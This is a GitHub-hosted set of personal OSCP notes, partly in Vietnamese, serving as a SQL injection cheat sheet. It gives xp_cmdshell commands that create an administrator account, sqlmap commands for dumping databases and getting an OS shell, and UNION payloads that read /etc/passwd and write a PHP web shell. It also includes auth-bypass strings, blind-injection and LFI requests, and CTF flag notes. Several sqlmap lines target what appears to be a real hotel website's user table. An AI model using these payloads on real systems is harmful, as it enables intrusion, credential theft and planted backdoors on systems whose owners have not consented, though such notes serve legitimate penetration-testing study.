Notes-OSCP/SQL at master · SugiB3o/Notes-OSCP · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
(54 sloc)  2.39 KB

SQSH

#Login
sqsh -S <targetip>:<port> -U sa -P password

# commands
exec xp_cmdshell 'whoami'
go
exec xp_cmdshell 'net user kalisa pass /add'
go
exec xp_cmdshell 'net localgroup Administrators kalisa /add'
go
exec xp_cmdshell 'net localgroup "Remote Desktop Users" kalisa /add'
go

------------------------------

SQLMAP
# Crawl the links
sqlmap -u http://<targetip> --crawl=1
sqlmap -u http://<targetip> --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3

# Search for databases
sqlmap –u http://<targetip>/index.php?par= –dbs

# dump tables from database
sqlmap –u http://<targetip>/index.php?par= –dbs –D dbname –tables –-dump
sqlmap –u http://<targetip>/index.php?par= –dbs –D dbname –T tablename –-dump

# OS Shell
sqlmap -u http://<targetip>/comment.php?id=738 --dbms=mysql --osshell

--------------------------------

Manual sql injection commands

# check for sqli vulnerability
?id=1'

# find the number of columns
?id=1 order by 9 -- -

# Find space to output db
?id=1 union select 1,2,3,4,5,6,7,8,9 -- -

# Get username of the sql-user
?id=1 union select 1,2,3,4,user(),6,7,8,9 -- -

# Get version
?id=1 union select 1,2,3,4,version(),6,7,8,9 -- -

# Get all tables
?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables -- -

# Get all columns from a specific table
?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = 'users' -- -

# Get content from the users-table. From columns name and password. (The 0x3a only servers to create a delimiter between name and password)
?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 FROM users

# read file
?id=1 union select 1,2,3,4, load_file('/etc/passwd') ,6,7,8,9 -- -
?id=1 union select 1,2,3,4, load_file('/var/www/login.php') ,6,7,8,9 -- -

# create a file and call it to check if really created
?id=1 union select 1,2,3,4,'this is a test message' ,6,7,8,9 into outfile '/var/www/test' -- -
?id=1 union select 1,2,3,4, load_file('/var/www/test') ,6,7,8,9 -- -

# create a file to get a shell
?id=1 union select null,null,null,null,'<?php system($_GET[‘cmd’]) ?>' ,6,7,8,9 into outfile '/var/www/shell.php' -- -
?id=1 union select null,null,null,null, load_file('/var/www/shell.php') ,6,7,8,9 -- -

# then go to browser and see if you can execute commands
http://<targetip>/shell.php?cmd=id

# Then use Pentest Monkey Reverse Shells to call your shell
----------------------------------------
Sql:
Fillter dấu trong Sql "=,-,*"
admin' or '2' > '1


Sql Truncation
admin                     sugi
anything


LDAP
user: admin
pass: *

Po po po po postgresql
'))OR TRUE

Area 51 .htaccess

curl -vv --cookie "PHPSESSID=5u5sonir2saqrdcn92bms31gd0" -X PUT https://ringzer0team.com/challenges/48 --ssl --insecure |grep "FLAG"
Security through obscurity!

YWRtaW4sYThmMTBmMWNlNGUxZjQ0YywxNDcxNjk1MTMyLHRydWU6OWVjNjRlYTE5NzlkNTc0ZWVjMDYzZGQzYmFlYmRlNTE=

admin,a8f10f1ce4e1f44c,1471695132,true=MD5
:9ec64ea1979d574eec063dd3baebde51

-----------------------------------------------------------------------------------------------------------------------------
sqlmap -u "http://web.challenges.pwnerrank.com/e5f3efcceb11226e71a6bc5317cf0df6/?password=a" -v 3 --dbs -D web5 -T flag --dump

----------------------------------------------------------------------------------------------------------------------------------
username=a' and 1=2 union select 1,1,1,1,1,1,1,1 -- -# &password=1
-------------------------------------------------------------------------------------------------------------------------------
sqlmap -u "https://www.hotelelsalvador.net/en/hotel-offer.php?&id=9" --tables -D information_schema
sqlmap -u "https://www.hotelelsalvador.net/en/hotel-offer.php?&id=9" --columns -D Sql436940_3 -T user
sqlmap -u "https://www.hotelelsalvador.net/en/hotel-offer.php?&id=9" --dump -D Sql436940_3 -T user
Blind SQl
sqlmap -u https://xxx.com//Default.aspx/verify --data "{\"ghi_nho\":false,\"mat_khau\":\"abc\",\"ten_dang_nhap\":\"e\"}" --random-agent -p mat_khau
Sniper
GET /e5f3efcceb11226e71a6bc5317cf0df6/?password=admin%27%20having%20(substr(flag,6,1))%20=%20%27§§%27%20%20--%20- HTTP/1.1
Host: web.challenges.pwnerrank.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: _ga=GA1.2.487678829.1472609687
Connection: keep-alive
Upgrade-Insecure-Requests: 1

Payload
Bruteforce
abcdef0123456789
Grep-Match: admin
-----------------------------------------------------------------------------------------------------------------

_ 1 ki tu bat ki
% tuong ung' nhieu ki tu bat ki

Select * From Book Where bookname Like 'a%'

---------------------------------------------------------------------------------------------------------------------------------
LFI
GET /?page=php: HTTP/1.1
Host: globalpage.chal.ctf.westerns.tokyo
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: /filter/convert.base64-encode/resource=flag
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

---------------------------------------------------------------------------------------------------------------------------------